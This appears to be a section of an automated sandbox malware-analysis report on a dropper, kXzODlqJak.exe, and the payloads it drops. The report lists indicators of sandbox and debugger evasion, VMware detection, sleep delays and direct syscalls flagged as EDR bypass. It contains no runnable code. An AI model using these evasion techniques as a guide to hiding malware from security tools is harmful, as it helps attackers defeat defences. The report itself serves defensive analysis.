Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\OEQWWE
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\QPFWAEKFTWAVC
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C67A3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,3_2_6C67A3DD
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6C2E7C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6C2E7C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6C2E7945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C2E3B54
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qpfwaekftwavcJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oeqwweJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeDropped PE file which has not been started: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\Ascidian.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeAPI coverage: 5.9 %
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe TID: 7780Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 3672Thread sleep time: -150000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 4100Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 2160Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0096A8A0h1_2_0096A805
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0096A899h1_2_0096A805
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001BA805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 001BA8A0h2_2_001BA805
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001BA805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 001BA899h2_2_001BA805
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00915C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00915C81
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00961290 FindFirstFileExW,1_2_00961290
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0097343B FindFirstFileW,FindClose,1_2_0097343B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0092E72A FindFirstFileW,FindNextFileW,FindClose,1_2_0092E72A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001B1290 FindFirstFileExW,2_2_001B1290
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001C343B FindFirstFileW,FindClose,2_2_001C343B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_0017E72A FindFirstFileW,FindNextFileW,FindClose,2_2_0017E72A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_00165C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_00165C81
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D470D44 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,wsprintfW,FindNextFileW,FindClose,2_2_6D470D44
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D470534 _memset,FindFirstFileW,FindClose,2_2_6D470534
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D44B005 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,wsprintfW,GetTickCount,wsprintfW,FindNextFileW,FindClose,2_2_6D44B005
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4472FA __EH_prolog3_GS,GetACP,GetACP,GetACP,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,2_2_6D4472FA
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C67CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6C67CC23
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C67C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6C67C8FD
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6481A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6C6481A1
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0097C535 VirtualQuery,GetSystemInfo,1_2_0097C535
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: VMware
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000003.00000003.1493027614.000000000A338000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 00000003.00000002.1515660840.000000006D06F000.00000008.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000008.00000002.1845347189.000000006C24F000.00000008.00000001.01000000.00000014.sdmpBinary or memory string: l.?AVQEmulationPaintEngine@@0/
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: cmd.exe, 00000005.00000002.1876913060.000000000275C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: RescueCDBurner.exe, 00000004.00000002.1574582615.000000006BFCF000.00000008.00000001.01000000.00000014.sdmpBinary or memory string: k.?AVQEmulationPaintEngine@@0/
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000003.00000002.1515660840.000000006D06F000.00000008.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000003.00000003.1493027614.000000000A338000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1574582615.000000006BFCF000.00000008.00000001.01000000.00000014.sdmp, RescueCDBurner.exe, 00000008.00000002.1845347189.000000006C24F000.00000008.00000001.01000000.00000014.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0095D3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0095D3EE
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D48530E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_6D48530E
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0091540B GetProcessHeap,RtlAllocateHeap,1_2_0091540B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00957142 SetUnhandledExceptionFilter,1_2_00957142
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0095D3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0095D3EE
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00956B18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00956B18
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00956FAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00956FAF
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001A7142 SetUnhandledExceptionFilter,2_2_001A7142
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001AD3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001AD3EE
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001A6B18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_001A6B18
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001A6FAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001A6FAF
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4746CD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6D4746CD
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4626E8 _wcscpy,_wcscpy,_wcscpy,_wcscpy,SetErrorMode,SetUnhandledExceptionFilter,2_2_6D4626E8
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D47D4E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D47D4E7
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6AAD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,3_2_6C6AAD2C
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C6307A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6C6307A7

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF799B6C8C2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtOpenKeyEx: Direct from: 0x7FF799A6DD6DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF799B93594Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799B37D02Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B3BF3BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B3FE5FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A7548AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799AC61D6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999EBB54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B41B29Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799AC8A54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF799A9CE0CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF799BDEB76Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799AC7905Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateMutant: Direct from: 0x7FF799A99CC5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF799A6813EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799ACAFF7
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799BE1097
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999ED052Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B6759EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B10B17Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999F2902Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF799A7BE25Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF799A9D451Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF799B637A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799A80ECFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B384F5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B3DDA8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999EA739Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A354ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799B45383Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B14EA0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999F057BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationThread: Direct from: 0x7FF799BEC5E6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799B37F27Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799BE10A5
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF799B6258BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A86E09Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF799BDFA02Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtEnumerateValueKey: Direct from: 0x7FF799B282E8Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x6D7F7B9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999ED233Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B4C62AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799BDCA0BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B5A871Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A7BF24Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeNtQuerySystemInformation: Direct from: 0x777563E1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CE826A1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799BE1083
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799A71094Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A93141Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B49E50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B3D6C6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A93D28Jump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999ECDC2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF799BDCCB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A81682Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999E3F62Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x7FF799A7BF81Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799A70C76Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF799A9D818Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799A80DF7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B43605Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799B96893Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799AF2733Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B3D855Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B38C5DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799B37DC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999FA233Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CEA4B5EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799AC4F99Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B3D7C8Jump to behavior
